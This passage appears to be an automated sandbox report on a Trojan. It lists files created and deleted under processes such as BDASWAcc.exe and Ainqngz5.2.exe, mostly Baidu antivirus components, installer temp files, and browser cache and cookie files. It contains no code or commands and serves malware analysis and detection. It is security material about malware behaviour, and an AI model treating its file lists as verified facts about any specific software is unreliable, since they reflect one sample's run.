%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\BDMSafePlugin.dll (6420 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsafeplugins\BDMKVMainPlugin.dll (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\virus_type.dat (485 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\MainframePluginContainerConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDMAVEng.dll (6420 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\GCCallbackBind.dll (24 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDMRepMgr.dll (3733 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\licenses\directui license.txt (593 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SusPlugin.rdb (163 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\HotPlugins.xml (386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\SysFixerLuaScript.dat (145 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMDownload.dll (324 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\GlobalPluginInfo.xml (25 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_appassext.dat (2 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\blacksign.dat (537 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMProcessRunningTime.dll (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMNet.dll (1358 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMTray\TrayPlugin.rdb (3 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOCleanerScript.dat (58 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMBase.dll (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmkvscanplugin\BDMKVScanPluginContainerConfig.xml (380 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMNetMon_WIN7_x86.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\KVMain.rdb (55 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\Mainpage.rdb (3831 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SafePlugin.rdb (4 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\SysFixerConfig.dat (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_5_speed.png (15 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«\Ã¥ÂÂ¸Ã¨Â½Â½Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«.lnk (796 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\Unknownfile.rdb (48 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\websafe\WebSafe.dll (6428 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\CompatibilityChecker.dll (140 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOTraceCleanerConfig.dat (5 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_6_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\BDMTrayTipsPlugin.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmpatcherplugins\BDMPatcher.dll (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDSWShellExt64.dll (3664 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\pluginUnit.dat (727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMReport.dll.bdl (35046 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BDMSOCleaner\SOTraceConfig.xml (9 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\BDMSOAccTrayPlugin.dll (3733 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMTips.exe (3743 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BaiduAnCache.rptc (552 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x64\bd0001.sys (160 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmkvscanplugin\BDMKVScanPlugin.dll (3745 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SOManager.rdb (1741 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\homepage.ini (361 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsusplugins\BDMSOAccSusPlugin.dll (3737 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMSOLiveAccDataMgr.dll (168 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bd0002.dll (1749 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\BDMCoolyPlugins\BDMCoolyContainerConfig.xml (465 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_4_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\hu.dll (3312 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\patch\publish.db (30058 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x64\BDArKit.sys (80 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\Patcher.rdb (143 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmpatcherplugins\PatcherContainer.xml (563 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\Pizmdb.7z (188613 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\DriverManager.dll (119 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMSWParseDetect.dll (1613 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\SWCatalogDataItem.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_8_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_7_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMWindowsLib.dll (99 bytes)
%Documents and Settings%\All Users\Desktop\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«.lnk (811 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\GameNoDisturb.ini (215 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMNet.dll (6392 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsafeplugins\SafePluginContainerConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\sd\BDLogicUtils.dll (3832 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\BDMSOCleanerTrayPlugin.dll (3757 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDAVCache.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\EnhanceBoost.dll (275 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\systemfile.dat (3 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_blank_speed.png (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_9_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\Softmgr.rdb (690 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_3_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMSOLiveAccEngine.dll (111 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\BDMNetMon_XP_x86.sys (95 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMReport.dll (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_0_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDEnhanceBoost.sys (96 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\bd0002.sys (205 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x64\BDMNetMon_WIN7_x64.sys (109 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\GCCommunicate.dll (28 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bd0001.dll (131 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_second_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\licenses\duilib license.txt (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDArKit.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDKV.rdb (29 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\bduf.dll (3823 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMFrameWork.dll (271 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsafeplugins\BDMPatcherPlugin.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\RTPPlugins\HIPS.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SYSAccMgrDll.dll (3761 bytes)
%System%\drivers\BDArKit.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmswmanagerplugins\BDMSWManagerView.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDALeakfixer.exe (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\BDMSOManagerPlugins\BDMSOCleanerPlugin.dll (15801 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\BDDownload\2015604100\Setting\host.dat (306 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_extlist.dat (3 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMNetMonMgrDll.dll (62 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOCleanerConfig.dat (6 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\StartupDict.dat (1783 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\RTPPlugins\RtpContainerConfig.xml (474 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMPatchAgent.dll (37 bytes)

The Trojan deletes the following file(s):

%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x86\bd0002.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\Pizmdb.7z (0 bytes)
C:\sds (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\sd\FileMon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (0 bytes)
%Program Files%\Baidu\sds (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh4.tmp (0 bytes)
%Program Files%\Baidu\BaiduAn\sds (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\BDMWrench.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\sd\BDLogicUtils.dll (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x86\BDMNetMon_WIN7_x86.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x64 (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDDownloader.exe (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x64\bd0002.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMNetMon_WIN7_x86.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bg_tips_speed_win8.png (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\sd (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x86\BDMNetMon_XP_x86.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\patch (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\BDEnhanceBoost.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x86 (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMTips.exe (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x86\BDArKit.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x64\BDMNetMon_WIN7_x64.sys (0 bytes)
%Program Files%\sds (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x64\BDArKit.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x64\bd0001.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x86\bd0001.sys (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\patch\publish.db (0 bytes)

The process BDASWAcc.exe:316 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\jquery.min[2].js (6467 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\iepngfix_tilebg[2].js (628 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\iepngfix_tilebg[1].js (105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\selected_page[1].html (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\jquery.min[1].js (6022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\selected_page[1].htm (10 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\jquery.min[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\iepngfix_tilebg[1].js (0 bytes)

The process Ainqngz5.2.exe:1136 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\core[1].php (751 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[2].jpg (2563 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\CAJQTKHL.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[13].jpg (1404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\openicon[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\select-normal[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\snapshot-game[2].jpg (554 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[10].jpg (3658 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\banner-kingston-20140815[1].jpg (27043 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\analytics[2].js (3574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[2].jpg (4640 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\home-hack[1].css (265 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[5].jpg (4787 bytes)
%Documents and Settings%\%current user%\UserData\YJM90VAL\www.fengyunzhibo[1].xml (478 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\fengyunzhibo[1] (1850 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\CAQJ8FJ8.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\nav-bk[1].png (126 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (6220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\jquery-1.8.3.min[1].js (62713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\user-icon[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\gameicon_s[1].png (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\default_avatar_s[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hm[2].js (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\header-v3[2].css (1361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\select-deep[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\fengyunzhibo[1].htm (2358 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\h[1].js (176 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[4].jpg (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[4].jpg (1144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\QQÃƒÂÃ‚Â¼Ãƒâ€ Ã‚Â¬20140316001047[1].jpg (30227 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\header-v3[2].js (3255 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[3].jpg (585 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (355 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\snapshot-game[1].jpg (1511 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\modernizr.custom.72764[2].js (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\analytics[1].js (2827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGXC.tmp (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[1].jpg (2274 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\fyminiloader-min[1].js (363 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\DD_belatedPNG_0.0.8a-min[1].js (3814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\box-v3[1].js (3 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (460 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[9].jpg (4187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[1].jpg (1731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\atrk[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\CA8D6JGD.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hm[3].js (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\lib[1].js (778 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\home-v3[1].png (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\CAXPJNAK.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\box-v3[2].js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\snapshot-game[4].jpg (3347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\header-v3[1].css (1106 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\home-v4[1].js (10653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[3].jpg (5088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[12].jpg (3048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\home-hack[2].css (446 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[1].jpg (1384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\snapshot-game[3].jpg (1176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\loading[1].gif (8152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\home-v4[1].css (2617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[7].jpg (1974 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[11].jpg (2814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\zhibo2[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[6].jpg (770 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\header-v3-media[1].css (612 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\fystat.min[1].js (25 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\sporticon_s[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\core[1].php (750 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\stat[1].php (4386 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@fengyunzhibo[2].txt (1186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[4].jpg (3096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\c[1].php (1163 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\report[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hm[1].js (387 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\snapshot-game[8].jpg (1977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\fyminiloader-min[2].js (660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\home-v3[1].png (15800 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\snapshot-game[5].jpg (789 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\header-v3[1].js (1761 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\h[2].js (817 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\json2[1].js (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\lib[2].js (2 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\www.fengyunzhibo[1].xml (266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\atrk[2].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\1pc[1].png (95 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[3].jpg (42 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@fengyunzhibo[1].txt (1758 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (892 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[5].jpg (2336 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\hyyy_ban[1].png (38404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\cover_bk[1].png (68 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\CAEJCPMJ.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\artsicon_s[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\system[1].js (1561 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (257 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\banner_bk[1].png (2878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\modernizr.custom.72764[1].js (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\snapshot-game[2].jpg (3371 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\atrk[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\header-v3[1].css (0 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\www.fengyunzhibo[1].xml (0 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\www.aaa[1].xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\h[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@fengyunzhibo[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
